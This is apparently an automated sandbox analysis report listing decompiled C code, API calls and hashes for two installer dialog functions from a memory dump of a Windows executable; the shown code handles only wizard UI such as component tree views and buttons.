                                                              • API String ID:
                                                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x501c89
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                              0x00404ccf
                                                              0x00404cd7
                                                              0x00404cdf
                                                              0x00404ce5
                                                              0x00404cfd
                                                              0x00404d00
                                                              0x00404d01
                                                              0x00404f2e
                                                              0x00404f35
                                                              0x00404f49
                                                              0x00404f37
                                                              0x00404f39
                                                              0x00404f3c
                                                              0x00404f3d
                                                              0x00404f44
                                                              0x00404f44
                                                              0x00404f55
                                                              0x00404f63
                                                              0x00404f66
                                                              0x00404f7c
                                                              0x00404ff1
                                                              0x00404ff4
                                                              0x00404ff6
                                                              0x00405000
                                                              0x0040500e
                                                              0x0040500e
                                                              0x00405010
                                                              0x0040501a
                                                              0x00405020
                                                              0x00405023
                                                              0x00405026
                                                              0x00405041
                                                              0x00405028
                                                              0x00405032
                                                              0x00405032
                                                              0x00405026
                                                              0x0040501a
                                                              0x00000000
                                                              0x00404ff4
                                                              0x00404f81
                                                              0x00404f8c
                                                              0x00404f91
                                                              0x00404f98
                                                              0x00404f9d
                                                              0x00404fa1
                                                              0x00404fac
                                                              0x00404fac
                                                              0x00404fb0
                                                              0x00404fb4
                                                              0x00404fb8
                                                              0x00404fcb
                                                              0x00404fba
                                                              0x00404fba
                                                              0x00404fc1
                                                              0x00404fc7
                                                              0x00404fc3
                                                              0x00404fc3
                                                              0x00404fc3
                                                              0x00404fc1
                                                              0x00404fcf
                                                              0x00404fd1
                                                              0x00404fe4
                                                              0x00404fe7
                                                              0x00404fea
                                                              0x00404fea
                                                              0x00404fb4
                                                              0x00000000
                                                              0x00404fa1
                                                              0x00404f83
                                                              0x00404f8a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405044
                                                              0x00405044
                                                              0x0040504b
                                                              0x004050bc
                                                              0x004050c4
                                                              0x004050cc
                                                              0x004050cc
                                                              0x004050d5
                                                              0x004050d7
                                                              0x004050de
                                                              0x004050e1
                                                              0x004050e1
                                                              0x004050e7
                                                              0x004050ee
                                                              0x004050f1
                                                              0x004050f1
                                                              0x004050f7
                                                              0x004050fd
                                                              0x00405103
                                                              0x00405103
                                                              0x00405110
                                                              0x00405270
                                                              0x00405277
                                                              0x00405294
                                                              0x0040529a
                                                              0x004052ac
                                                              0x004052ac
                                                              0x00000000
                                                              0x00405116
                                                              0x00405118
                                                              0x0040511d
                                                              0x00405122
                                                              0x00405127
                                                              0x00405129
                                                              0x00405129
                                                              0x0040512a
                                                              0x0040512b
                                                              0x0040512d
                                                              0x0040512d
                                                              0x00405135
                                                              0x00405176
                                                              0x00405178
                                                              0x00405188
                                                              0x0040518b
                                                              0x00405190
                                                              0x00405197
                                                              0x0040519a
                                                              0x0040523c
                                                              0x00405244
                                                              0x0040524c
                                                              0x0040524c
                                                              0x00405252
                                                              0x0040525a
                                                              0x0040526b
                                                              0x0040526b
                                                              0x00000000
                                                              0x0040525a
                                                              0x004051a0
                                                              0x004051a3
                                                              0x004051a9
                                                              0x004051ae
                                                              0x004051b0
                                                              0x004051b2
                                                              0x004051b8
                                                              0x004051bf
                                                              0x004051c4
                                                              0x004051cb
                                                              0x004051ce
                                                              0x004051ce
                                                              0x004051d5
                                                              0x004051e1
                                                              0x004051e5
                                                              0x004051e7
                                                              0x004051e7
                                                              0x004051d7
                                                              0x004051d9
                                                              0x004051d9
                                                              0x00405207
                                                              0x00405213
                                                              0x00405222
                                                              0x00405222
                                                              0x00405224
                                                              0x00405227
                                                              0x00405230
                                                              0x00000000
                                                              0x00405137
                                                              0x00405142
                                                              0x00405145
                                                              0x0040514a
                                                              0x0040514c
                                                              0x00405150
                                                              0x00405160
                                                              0x0040516a
                                                              0x0040516c
                                                              0x0040516f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405152
                                                              0x00405152
                                                              0x00405158
                                                              0x0040515a
                                                              0x0040515a
                                                              0x0040515b
                                                              0x0040515c
                                                              0x00000000
                                                              0x00405152
                                                              0x00405135
                                                              0x00405110
                                                              0x00405053
                                                              0x00000000
                                                              0x00405069
                                                              0x00405073
                                                              0x00405078
                                                              0x00000000
                                                              0x00000000
                                                              0x0040508a
                                                              0x0040508f
                                                              0x0040509b
                                                              0x0040509b
                                                              0x0040509d
                                                              0x004050ac
                                                              0x004050ae
                                                              0x004050b2
                                                              0x004050b5
                                                              0x00000000
                                                              0x004050b5
                                                              0x00405053
                                                              0x00404d07
                                                              0x00404d0a
                                                              0x00404d0d
                                                              0x00404d1d
                                                              0x00404d30
                                                              0x00404d3b
                                                              0x00404d41
                                                              0x00404d4f
                                                              0x00404d62
                                                              0x00404d67
                                                              0x00404d72
                                                              0x00404d7b
                                                              0x00404d91
                                                              0x00404da1
                                                              0x00404dad
                                                              0x00404dad
                                                              0x00404db2
                                                              0x00404db8
                                                              0x00404dba
                                                              0x00404dbd
                                                              0x00404dc2
                                                              0x00404dc7
                                                              0x00404dc9
                                                              0x00404dc9
                                                              0x00404de9
                                                              0x00404de9
                                                              0x00404deb
                                                              0x00404dec
                                                              0x00404df1
                                                              0x00404df7
                                                              0x00404dfb
                                                              0x00404e00
                                                              0x00404e08
                                                              0x00404e0c
                                                              0x00404e11
                                                              0x00404e16
                                                              0x00404e1e
                                                              0x00404e21
                                                              0x00404ef0
                                                              0x00404f03
                                                              0x00000000
                                                              0x00404e27
                                                              0x00404e2a
                                                              0x00404e2d
                                                              0x00404e30
                                                              0x00404e30
                                                              0x00404e35
                                                              0x00404e3e
                                                              0x00404e41
                                                              0x00404e45
                                                              0x00404e48
                                                              0x00404e4b
                                                              0x00404e54
                                                              0x00404e5d
                                                              0x00404e60
                                                              0x00404e63
                                                              0x00404e66
                                                              0x00404ea4
                                                              0x00404ecf
                                                              0x00404ea6
                                                              0x00404eb5
                                                              0x00404eb5
                                                              0x00404e68
                                                              0x00404e6b
                                                              0x00404e79
                                                              0x00404e83
                                                              0x00404e8b
                                                              0x00404e92
                                                              0x00404e9d
                                                              0x00404e9d
                                                              0x00404e66
                                                              0x00404ed5
                                                              0x00404ed6
                                                              0x00404ee2
                                                              0x00404ee2
                                                              0x00404eee
                                                              0x00404f09
                                                              0x00404f0c
                                                              0x00404f29
                                                              0x00000000
                                                              0x00404f0e
                                                              0x00404f13
                                                              0x00404f1c
                                                              0x004052ae
                                                              0x004052c0
                                                              0x004052c0
                                                              0x00404f0c
                                                              0x00000000
                                                              0x00404eee
                                                              0x00404e21

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CC8
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404CD5
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D3B
                                                              • SetWindowLongA.USER32 ref: 00404D55
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                                              • SendMessageA.USER32 ref: 00404D91
                                                              • SendMessageA.USER32 ref: 00404D9D
                                                              • SendMessageA.USER32 ref: 00404DAD
                                                              • DeleteObject.GDI32(00000110), ref: 00404DB2
                                                              • SendMessageA.USER32 ref: 00404DDD
                                                              • SendMessageA.USER32 ref: 00404DE9
                                                              • SendMessageA.USER32 ref: 00404E83
                                                              • SendMessageA.USER32 ref: 00404EB3
                                                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                                                              • SendMessageA.USER32 ref: 00404EC7
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404EF5
                                                              • SetWindowLongA.USER32 ref: 00404F03
                                                              • ShowWindow.USER32(?,00000005), ref: 00404F13
                                                              • SendMessageA.USER32 ref: 0040500E
                                                              • SendMessageA.USER32 ref: 00405073
                                                              • SendMessageA.USER32 ref: 00405088
                                                              • SendMessageA.USER32 ref: 004050AC
                                                              • SendMessageA.USER32 ref: 004050CC
                                                              • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                                              • GlobalFree.KERNEL32(?), ref: 004050F1
                                                              • SendMessageA.USER32 ref: 0040516A
                                                              • SendMessageA.USER32 ref: 00405213
                                                              • SendMessageA.USER32 ref: 00405222
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                                              • ShowWindow.USER32(?,00000000), ref: 0040529A
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004052A5
                                                              • ShowWindow.USER32(00000000), ref: 004052AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                              • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                                              • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                              • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                              0x00403de1
                                                              0x00403dea
                                                              0x00403f2b
                                                              0x00403f2f
                                                              0x00403f33
                                                              0x00403f35
                                                              0x00403f3a
                                                              0x00403f45
                                                              0x00403f50
                                                              0x00403f55
                                                              0x00403f57
                                                              0x00403f59
                                                              0x00403f5c
                                                              0x00403f61
                                                              0x00403f6f
                                                              0x00403f7c
                                                              0x00403f83
                                                              0x00403f83
                                                              0x00403f84
                                                              0x00403f84
                                                              0x00403f89
                                                              0x00403f8f
                                                              0x00403f96
                                                              0x00403f9c
                                                              0x00403f9e
                                                              0x00403fde
                                                              0x00403fe3
                                                              0x00403fe8
                                                              0x00403fe8
                                                              0x00403fed
                                                              0x00403ff6
                                                              0x00403ff8
                                                              0x00403ffd
                                                              0x00404003
                                                              0x00404007
                                                              0x00404007
                                                              0x0040400c
                                                              0x00404012
                                                              0x00000000
                                                              0x00000000
                                                              0x0040401d
                                                              0x00404023
                                                              0x00000000
                                                              0x00000000
                                                              0x0040402c
                                                              0x00404034
                                                              0x00404039
                                                              0x0040403c
                                                              0x00404042
                                                              0x00404047
                                                              0x0040404a
                                                              0x00404050
                                                              0x00404055
                                                              0x00404058
                                                              0x0040405e
                                                              0x00404066
                                                              0x0040406c
                                                              0x00404072
                                                              0x00404076
                                                              0x0040407d
                                                              0x0040407d
                                                              0x0040407d
                                                              0x00404087
                                                              0x00404099
                                                              0x004040a5
                                                              0x004040aa
                                                              0x004040b4
                                                              0x004040ba
                                                              0x004040bc
                                                              0x004040c1
                                                              0x004040be
                                                              0x004040be
